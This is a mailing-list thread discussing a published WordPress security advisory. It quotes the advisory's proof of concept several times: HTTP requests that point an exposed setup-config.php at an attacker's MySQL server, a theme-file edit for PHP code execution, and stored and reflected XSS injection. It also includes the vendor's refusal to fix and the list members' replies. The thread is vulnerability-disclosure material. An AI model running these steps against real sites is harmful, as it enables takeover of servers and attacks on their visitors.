Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
On Wed, Jan 25, 2012 at 04:13:12PM +, Benji wrote: Yes it does. wp-admin/setup-config.php?step=1 on any wp install where it exists gives this: The file 'wp-config.php' already exists one level above your WordPress installation. If you need to reset any of the configuration items in this file, please delete it first. Yes this is correct information at least with new versions of WordPress. We are running pretty big Linux-server in our organization and I can tell you that open install me -pages are very common and I see these as problem. I can try to find out what went wrong with the installation or did they remove the WordPress-installation and didn't understand to remove everything included. I really hope to see this patched anyways just to be sure. I don't know what the actual impact in user-experience can be. Could WordPress comment? - Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
The vendor was notified. They have chosen not to fix the issue at this time.
The Vendor Response section has the details:
Vendor Response:
Due to the fact that the component in question is an installation script,
the vendor has stated that the attack surface is too small to warrant
a fix:
We give priority to a better user experience at the install process. It is
unlikely a user would go to the trouble of installing a copy of WordPress
and then not finishing the setup process more-or-less immediately. The
window of opportunity for exploiting such a vulnerability is very small.
However, Trustwave SpiderLabs urges caution in situations where the
WordPress installation script is provided as part of a default image.
This is often done as a convenience on hosting providers, even in
cases where the client does not use the software. It is a best practice
to ensure that no installation scripts are exposed to outsiders, and
these vulnerabilities reinforce the importance of this step.
-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Henri Salo
Sent: Tuesday, January 24, 2012 5:48 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in
WordPress
On Tue, Jan 24, 2012 at 04:09:16PM -0600, Trustwave Advisories wrote:
Trustwave's SpiderLabs Security Advisory TWSL2012-002:
Multiple Vulnerabilities in WordPress
https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt
Published: 1/24/12
Version: 1.0
Vendor: WordPress (http://wordpress.org/)
Product: WordPress
Version affected: 3.3.1 and prior
Product description:
WordPress is a free and open source blogging tool and publishing
platform powered by PHP and MySQL.
Credit: Jonathan Claudius of Trustwave SpiderLabs
Finding 1: PHP Code Execution and Persistent Cross Site Scripting
Vulnerabilities via 'setup-config.php' page.
CVE: CVE-2011-4899
The WordPress 'setup-config.php' installation page allows users to
install WordPress in local or remote MySQL databases. This typically
requires a user to have valid MySQL credentials to complete. However,
a malicious user can host their own MySQL database server and can
successfully complete the WordPress installation without having valid
credentials on the target system.
After the successful installation of WordPress, a malicious user can
inject malicious PHP code via the WordPress Themes editor. In
addition, with control of the database store, malicious Javascript can
be injected into the content of WordPress yielding persistent Cross Site
Scripting.
Proof of Concept:
Servers Involved
A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User's MySQL Instance
1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port
3306
2.) Performs POST/GET Requests to Install WordPress into MySQL
Instance
Request #1
--
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
dbname=wordpressuname=jsmithpwd=jsmithdbhost=W.X.Y.Zprefix=wp_sub
mit=Submit
Request #2
--
GET /wp-admin/install.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT
3.) Get PHP Code Execution
Malicious user edits 404.php via Themes Editor as follows:
?php
phpinfo();
?
Note #1: Any php file in the theme could be used.
Note #2: Depending settings, PHP may be used to execute system commands
on webserver.
Malicious user performs get request of modified page to execute code.
Request
---
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
4.) Get Persistent Cross Site Scripting
Malicious User Injects Malicious Javascript into their own MySQL
database instance
MySQL Query
---
update wp_comments SET
comment_content='scriptalert('123')/script' where
comment_content='Hi, this is a comment.br /To delete \ a comment,
just log
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
On Wed, Jan 25, 2012 at 08:43:34AM -0600, Trustwave Advisories wrote: The vendor was notified. They have chosen not to fix the issue at this time. The Vendor Response section has the details: Vendor Response: Due to the fact that the component in question is an installation script, the vendor has stated that the attack surface is too small to warrant a fix: We give priority to a better user experience at the install process. It is unlikely a user would go to the trouble of installing a copy of WordPress and then not finishing the setup process more-or-less immediately. The window of opportunity for exploiting such a vulnerability is very small. However, Trustwave SpiderLabs urges caution in situations where the WordPress installation script is provided as part of a default image. This is often done as a convenience on hosting providers, even in cases where the client does not use the software. It is a best practice to ensure that no installation scripts are exposed to outsiders, and these vulnerabilities reinforce the importance of this step. There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. - Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote: There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. I may have missed something, but does simply having the file exposed make you vulnerable. From looking at it, it starts of with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have. Tim -- Tim Brown mailto:t...@65535.com signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
Dear full-disclosure I wrote to you to tell you about serious serious vulnerability in all Windows versions. If you turn machine on before system is configured, then you be able to set user password yourself, big gaping hole I make big large botnet to fully utilise this impressive vulnerability! thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i say nay though! Big time russian mobster offer me diamond, i say nay! I like report vuln of this size responsibility in so hope to make more money^H^H^H^H^H^H^Hsecure world. Please full-disclosure, this vuln is serious and i plead you shut down all windows now. I wrote metasploit module! It find new installs turned off machine, WOL and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many wifes! On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote: On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote: There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. I may have missed something, but does simply having the file exposed make you vulnerable. From looking at it, it starts of with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have. Tim -- Tim Brown mailto:t...@65535.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
Yes it does. wp-admin/setup-config.php?step=1 on any wp install where it exists gives this: The file 'wp-config.php' already exists one level above your WordPress installation. If you need to reset any of the configuration items in this file, please delete it first. On Wed, Jan 25, 2012 at 4:11 PM, Julius Kivimäki julius.kivim...@gmail.comwrote: Funny but no, this does not need a non-installed wordpress. 2012/1/25 Benji m...@b3nji.com Dear full-disclosure I wrote to you to tell you about serious serious vulnerability in all Windows versions. If you turn machine on before system is configured, then you be able to set user password yourself, big gaping hole I make big large botnet to fully utilise this impressive vulnerability! thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i say nay though! Big time russian mobster offer me diamond, i say nay! I like report vuln of this size responsibility in so hope to make more money^H^H^H^H^H^H^Hsecure world. Please full-disclosure, this vuln is serious and i plead you shut down all windows now. I wrote metasploit module! It find new installs turned off machine, WOL and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many wifes! On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote: On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote: There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. I may have missed something, but does simply having the file exposed make you vulnerable. From looking at it, it starts of with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have. Tim -- Tim Brown mailto:t...@65535.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
Funny but no, this does not need a non-installed wordpress. 2012/1/25 Benji m...@b3nji.com Dear full-disclosure I wrote to you to tell you about serious serious vulnerability in all Windows versions. If you turn machine on before system is configured, then you be able to set user password yourself, big gaping hole I make big large botnet to fully utilise this impressive vulnerability! thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i say nay though! Big time russian mobster offer me diamond, i say nay! I like report vuln of this size responsibility in so hope to make more money^H^H^H^H^H^H^Hsecure world. Please full-disclosure, this vuln is serious and i plead you shut down all windows now. I wrote metasploit module! It find new installs turned off machine, WOL and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many wifes! On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote: On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote: There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. I may have missed something, but does simply having the file exposed make you vulnerable. From looking at it, it starts of with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have. Tim -- Tim Brown mailto:t...@65535.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
Trustwave's SpiderLabs Security Advisory TWSL2012-002:
Multiple Vulnerabilities in WordPress
https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt
Published: 1/24/12
Version: 1.0
Vendor: WordPress (http://wordpress.org/)
Product: WordPress
Version affected: 3.3.1 and prior
Product description:
WordPress is a free and open source blogging tool and publishing platform
powered by PHP and MySQL.
Credit: Jonathan Claudius of Trustwave SpiderLabs
Finding 1: PHP Code Execution and Persistent Cross Site Scripting
Vulnerabilities via 'setup-config.php' page.
CVE: CVE-2011-4899
The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. This typically requires a user
to have valid MySQL credentials to complete. However, a malicious user can
host their own MySQL database server and can successfully complete the
WordPress installation without having valid credentials on the target system.
After the successful installation of WordPress, a malicious user can inject
malicious PHP code via the WordPress Themes editor. In addition, with control
of the database store, malicious Javascript can be injected into the content
of WordPress yielding persistent Cross Site Scripting.
Proof of Concept:
Servers Involved
A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User's MySQL Instance
1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306
2.) Performs POST/GET Requests to Install WordPress into MySQL Instance
Request #1
--
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
dbname=wordpressuname=jsmithpwd=jsmithdbhost=W.X.Y.Zprefix=wp_submit=Submit
Request #2
--
GET /wp-admin/install.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT
3.) Get PHP Code Execution
Malicious user edits 404.php via Themes Editor as follows:
?php
phpinfo();
?
Note #1: Any php file in the theme could be used.
Note #2: Depending settings, PHP may be used to execute system commands
on webserver.
Malicious user performs get request of modified page to execute code.
Request
---
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
4.) Get Persistent Cross Site Scripting
Malicious User Injects Malicious Javascript into their own MySQL database
instance
MySQL Query
---
update wp_comments SET
comment_content='scriptalert('123')/script' where comment_content='Hi,
this is a comment.br /To delete \ a comment, just log in and view the
post#039;s comments. There you will have the option to edit or delete
them.';
Non-malicious User Visits Wordpress installation and has Javascript executed on
their browser
Request
---
GET /?p=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Finding 2: Multiple Cross Site Scripting Vulnerabilities in
'setup-config.php' page
CVE: CVE-2012-0782
The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. When using this installation page
the user is asked to supply the database name, the server that the database
resides on, and a valid MySQL username and password.
During this process, malicious users can supply javascript within
the dbname, dbhost or uname parameters. Upon clicking the submission
button, the javascript is rendered in the client's browser.
Proof of Concept:
Servers Involved
A.B.C.D = Target WordPress Web Server
Request
---
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type:
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
On Tue, Jan 24, 2012 at 04:09:16PM -0600, Trustwave Advisories wrote:
Trustwave's SpiderLabs Security Advisory TWSL2012-002:
Multiple Vulnerabilities in WordPress
https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt
Published: 1/24/12
Version: 1.0
Vendor: WordPress (http://wordpress.org/)
Product: WordPress
Version affected: 3.3.1 and prior
Product description:
WordPress is a free and open source blogging tool and publishing platform
powered by PHP and MySQL.
Credit: Jonathan Claudius of Trustwave SpiderLabs
Finding 1: PHP Code Execution and Persistent Cross Site Scripting
Vulnerabilities via 'setup-config.php' page.
CVE: CVE-2011-4899
The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. This typically requires a user
to have valid MySQL credentials to complete. However, a malicious user can
host their own MySQL database server and can successfully complete the
WordPress installation without having valid credentials on the target system.
After the successful installation of WordPress, a malicious user can inject
malicious PHP code via the WordPress Themes editor. In addition, with control
of the database store, malicious Javascript can be injected into the content
of WordPress yielding persistent Cross Site Scripting.
Proof of Concept:
Servers Involved
A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User's MySQL Instance
1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306
2.) Performs POST/GET Requests to Install WordPress into MySQL Instance
Request #1
--
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
dbname=wordpressuname=jsmithpwd=jsmithdbhost=W.X.Y.Zprefix=wp_submit=Submit
Request #2
--
GET /wp-admin/install.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT
3.) Get PHP Code Execution
Malicious user edits 404.php via Themes Editor as follows:
?php
phpinfo();
?
Note #1: Any php file in the theme could be used.
Note #2: Depending settings, PHP may be used to execute system commands
on webserver.
Malicious user performs get request of modified page to execute code.
Request
---
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
4.) Get Persistent Cross Site Scripting
Malicious User Injects Malicious Javascript into their own MySQL database
instance
MySQL Query
---
update wp_comments SET
comment_content='scriptalert('123')/script' where comment_content='Hi,
this is a comment.br /To delete \ a comment, just log in and view the
post#039;s comments. There you will have the option to edit or delete
them.';
Non-malicious User Visits Wordpress installation and has Javascript executed
on their browser
Request
---
GET /?p=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Finding 2: Multiple Cross Site Scripting Vulnerabilities in
'setup-config.php' page
CVE: CVE-2012-0782
The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. When using this installation
page
the user is asked to supply the database name, the server that the database
resides on, and a valid MySQL username and password.
During this process, malicious users can supply javascript within
the dbname, dbhost or uname parameters. Upon clicking the submission
button, the javascript is rendered in the client's browser.
Proof of Concept:
Servers Involved
A.B.C.D = Target WordPress Web Server
Request
---
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
